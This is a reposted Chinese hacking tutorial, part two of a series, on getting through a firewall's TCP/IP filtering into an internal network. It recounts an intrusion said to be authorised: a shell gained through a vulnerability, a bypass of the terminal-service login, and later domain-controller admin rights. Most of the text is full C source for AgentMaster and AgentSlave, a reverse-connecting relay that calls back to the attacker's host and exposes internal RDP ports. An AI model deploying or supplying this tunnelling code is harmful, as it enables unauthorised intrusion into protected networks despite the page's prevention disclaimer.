突破TCP-IP過濾-防火墻進入內網（二）_網絡服務器

突破TCP-IP過濾-防火墻進入內網（二）

發表于：2007-07-02來源：作者：點擊數：標簽：

(注:本站轉載這篇文章旨在希望通過這篇文章來如何預防來自網絡的危險,并不鼓勵讀者去做相應的破壞活動,特此聲明) 作者:eyas 第二部分：利用TCP socket轉發和反彈TCP端口進入有防火墻保護的內網事實上很多內網沒有第一部分所說的那么簡單啦，我們來看一個

　　(注:本站轉載這篇文章旨在希望通過這篇文章來如何預防來自網絡的危險,并不鼓勵讀者去做相應的破壞活動,特此聲明)

　　作者:eyas

第二部分：利用TCP socket轉發和反彈TCP端口進入有防火墻保護的內網

　　事實上很多內網沒有第一部分所說的那么簡單啦，我們來看一個有防火墻保護的內網,前提是這個防火墻對反彈TCP端口不做限制，限制了的話，又另當別論了。假設網絡拓撲如下：

　　sever-firewall-Ethe.net-攻擊者

　　上面的網絡拓撲是我在一次對朋友公司網站授權入侵過程中遇到的。

　　<1>我自己處于公司內網192.168.0.2，通過公司網關202.1.1.1到Internet，但我是網關的admin：）。

　　<2>敵人[其實是friend啦]的網關OS是2k adv server，在外網網卡上做了TCP/IP限制，只開放了25,53,80,110,3306這幾個TCP PORT，通過一個漏洞，我得到了一個shell，可以通過IE來執行系統命令，雖然權限很低。網關有終端服務，登陸驗證漏洞補丁未安裝，但輸入法幫助文件已經被刪除了，但是我們可以通過shell把輸入法幫助文件upload上去，因為他的系統權限沒有設置好，我們可以寫，呵呵。這樣的話，我們只要能夠連接到他的終端服務上去，我們就能繞過登陸驗證，得到admin權限了。如何連接？有辦法，用TCP socket轉發。和第一部分說的一樣嗎？有些不同。因為他做了TCP/IP限制，我們不能連接他，只能讓他來連接我們了，TCP反彈端口，呵呵。

　　攻擊流程如下：

　　<1>在我的服務器202.1.1.1運行AgentMaster，監聽TCP PORT 12345，等待202.2.2.2來連接，監聽TCP PORT 3389，等待我192.168.0.2連接。

　　<2>在敵人網關機器202.2.2.2運行AgentSlave，連接到202.1.1.1 TCP PORT 12345[注意：是反彈端口，TCP/IP過濾也拿他沒辦法]

　　<3>我自己192.168.0.2用TermClient連接到自己的服務器202.1.1.1:3389

　　<4>敵人網關上的AgentSlave連接到自己本身在內網的IP==>192.168.1.1:3389

　　<5>數據通道就建立好啦。兩個代理忠實的為我們轉發數據，呵呵。當我們連接自己服務器的3389，其實出來的是敵人內網的某臺機器，呵呵。

　　后來發現敵人的主域控制器是192.168.1.4，通過前面與他網關建立的連接，利用一個漏洞輕易的取得主域的admin權限，呵呵。他可能認為主域在內網，網關又做了TCP/IP過濾，攻擊者沒有辦法進入。我只要把AgentSlave設置為連接192.168.1.4:3389，以后就可以直接連接他的主域控制器啦，不過在網關登陸也一樣。

　　程序代碼如下[程序中所用到的TCPDataRedird.c已經貼在第一部分，那個文件做數據轉發，通用的]：

clearcase/" target="_blank" >cccccc border=1>



/******************************************************************



Module Name:AgentMaster.c 



Date:2001/4/16 



CopyRight(c) eyas 



說明：scoket代理主控端，負責監聽兩個TCP socket,

等待攻擊者和AgentSlave來連接，兩個 



scoket都連接成功后，開始轉發數據 



sock[0]是client==>sock[0] sock[1]是target==>sock[1] 



********************************************************************



#include  



#include  



#include "TCPDataRedird.c" 







#pragma comment(lib,"ws2_32.lib") 







#define TargetPort 3389//偽裝的target的監聽端口 



#define LocalPort 12345//等待AgentSlave來connect的端口 



int main() 



{ 



WSADATA wsd; 



SOCKET s3389=INVALID_SOCKET,//本機監聽的socket，等待攻擊者連接 



s1981=INVALID_SOCKET,//監聽的socket,等待AgentSlave來連接 



sock[2]={INVALID_SOCKET,INVALID_SOCKET}; 



struct sockaddr_in Local3389,Local1981,Attack,Slave; 



int iAddrSize; 



HANDLE hThreadC2T=NULL,//C2T=ClientToTarget 



hThreadT2C=NULL;//T2C=TargetToClient 



DWORD dwThreadID; 







__try 



{ 



//load winsock library 



if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 



{ 



printf(" WSAStartup() failed:%d",GetLastError()); 



__leave; 



} 



//create socket 



s3389=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 



if(s3389==INVALID_SOCKET) 



{ 



printf(" socket() failed:%d",GetLastError()); 



__leave; 



} 



//create socket 



s1981=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 



if(s1981==INVALID_SOCKET) 



{ 



printf(" socket() failed:%d",GetLastError()); 



__leave; 



} 



//fill the struct 



Local3389.sin_addr.s_addr=htonl(INADDR_ANY); 



Local3389.sin_family=AF_INET; 



Local3389.sin_port=htons(TargetPort); 







Local1981.sin_addr.s_addr=htonl(INADDR_ANY); 



Local1981.sin_family=AF_INET; 



Local1981.sin_port=htons(LocalPort); 



//bind s3389 for attacker 



if(bind(s3389,(struct sockaddr *)&Local3389,sizeof(Local3389))==SOCKET_ERROR) 



{ 



printf(" bind() failed:%d",GetLastError()); 



__leave; 



} 



//listen for attacker to connect 



if(listen(s3389,1)==SOCKET_ERROR) 



{ 



printf(" listen() failed:%d",GetLastError()); 



__leave; 



} 



//bind s1981 for AgentSlave 



if(bind(s1981,(struct sockaddr *)&Local1981,sizeof(Local1981))==SOCKET_ERROR) 



{ 



printf(" bind() failed:%d",GetLastError()); 



__leave; 



} 



//listen for AgentSlave to connect 



if(listen(s1981,1)==SOCKET_ERROR) 



{ 



printf(" listen() failed:%d",GetLastError()); 



__leave; 



} 



//socket循環 



while(1) 



{ 



//wait for AgentSlave to connect 



iAddrSize=sizeof(Slave); 



sock[1]=accept(s1981,(struct sockaddr *)&Slave,&iAddrSize); 



if(sock[1]==INVALID_SOCKET) 



{ 



printf(" accept() failed:%d",GetLastError()); 



break; 



} 



printf(" Accept AgentSlave==>%s:%d",inet_ntoa(Slave.sin_addr), 



ntohs(Slave.sin_port)); 



//wait for Attacker to connect 



iAddrSize=sizeof(Attack); 



sock[0]=accept(s3389,(struct sockaddr *)&Attack,&iAddrSize); 



if(sock[0]==INVALID_SOCKET) 



{ 



printf(" accept() failed:%d",GetLastError()); 



break; 



} 



printf(" Accept Attacker==>%s:%d",inet_ntoa(Attack.sin_addr), 



ntohs(Attack.sin_port)); 



//創建兩個線程進行數據轉發 



hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID); 



hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID); 



//等待兩個線程結束 



WaitForSingleObject(hThreadC2T,INFINITE); 



CloseHandle(hThreadC2T); 



CloseHandle(hThreadT2C); 



closesocket(sock[0]); 



closesocket(sock[1]); 



}//end of socket while 



}//end of try 



__finally 



{ 



//clean all 



if(s3389!=INVALID_SOCKET) closesocket(s3389); 



if(s1981!=INVALID_SOCKET) closesocket(s1981); 



if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]); 



if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]); 



if(hThreadC2T!=NULL) CloseHandle(hThreadC2T); 



if(hThreadT2C!=NULL) CloseHandle(hThreadT2C); 



WSACleanup(); 



} 



return 0; 



} 



/**********************************************************************



Module:AgentSlave.c 



Date:2001/4/17 



Copyright(c)eyas 



HomePage:www.patching.net 



說明：這個程序負責連接最終目標，連接主控端，然后轉發數據 



這里連接到AgenrMaster的socket相當與sClient==>sock[0]， 



連接到最終目標的socoket是sTarget==>sock[1] 



***********************************************************************



#include  



#include  



#include "TCPDataRedird.c" 







#pragma comment(lib,"ws2_32.lib") 







#define TargetIP "192.168.1.3" 



#define TargetPort (int)3389 



#define AgentMasterIP "202.1.1.1" 



#define AgentMasterPort (int)12345 







int main() 



{ 



WSADATA wsd; 



SOCKET sock[2]={INVALID_SOCKET,INVALID_SOCKET}; 



struct sockaddr_in Master,Target; 



HANDLE hThreadC2T=NULL,//C2T=ClientToTarget 



hThreadT2C=NULL;//T2C=TargetToClient 



DWORD dwThreadID; 







__try 



{ 



//load winsock library 



if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 



{ 



printf(" WSAStartup() failed:%d",GetLastError()); 



__leave; 



} 



//循環 



while(1) 



{ 



//create client socket 



sock[0]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 



if(sock[0]==INVALID_SOCKET) 



{ 



printf(" socket() failed:%d",GetLastError()); 



__leave; 



} 



//create target socket 



sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 



if(sock[1]==INVALID_SOCKET) 



{ 



printf(" socket() failed:%d",GetLastError()); 



__leave; 



} 



//fill struct 



Target.sin_family=AF_INET; 



Target.sin_addr.s_addr=inet_addr(TargetIP); 



Target.sin_port=htons(TargetPort); 







Master.sin_family=AF_INET; 



Master.sin_addr.s_addr=inet_addr(AgentMasterIP); 



Master.sin_port=htons(AgentMasterPort); 



//connect to AgentMaster 



if(connect(sock[0],(struct sockaddr *)&Master,sizeof(Master))==SOCKET_ERROR) 



{ 



//連接失敗后，等待一會兒再連 



printf(" connect() to master failed:%d",GetLastError()); 



closesocket(sock[0]); 



closesocket(sock[1]); 



Sleep(5000); 



continue; 



} 



printf(" connect to %s %d success!",AgentMasterIP,AgentMasterPort); 



//connect to target 



if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR) 



{ 



printf(" connect() to target failed:%d",GetLastError()); 



__leave; 



} 



printf(" connect to %s %d success!",TargetIP,TargetPort); 



//創建兩個線程進行數據轉發 



hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID); 



hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID); 



//等待兩個線程結束 



WaitForSingleObject(hThreadC2T,INFINITE); 



CloseHandle(hThreadC2T); 



CloseHandle(hThreadT2C); 



closesocket(sock[0]); 



closesocket(sock[1]); 



}//end of while 



}//end of try 



__finally 



{ 



if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]); 



if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]); 



if(hThreadC2T!=NULL) CloseHandle(hThreadC2T); 



if(hThreadT2C!=NULL) CloseHandle(hThreadT2C); 



WSACleanup(); 



} 



return 0; 



}

　　轉自:www.patching.net

原文轉自：http://www.kjueaiud.com

軟件測試 > 測試開發技術 > 軟件測試環境搭建 > 網絡服務器 >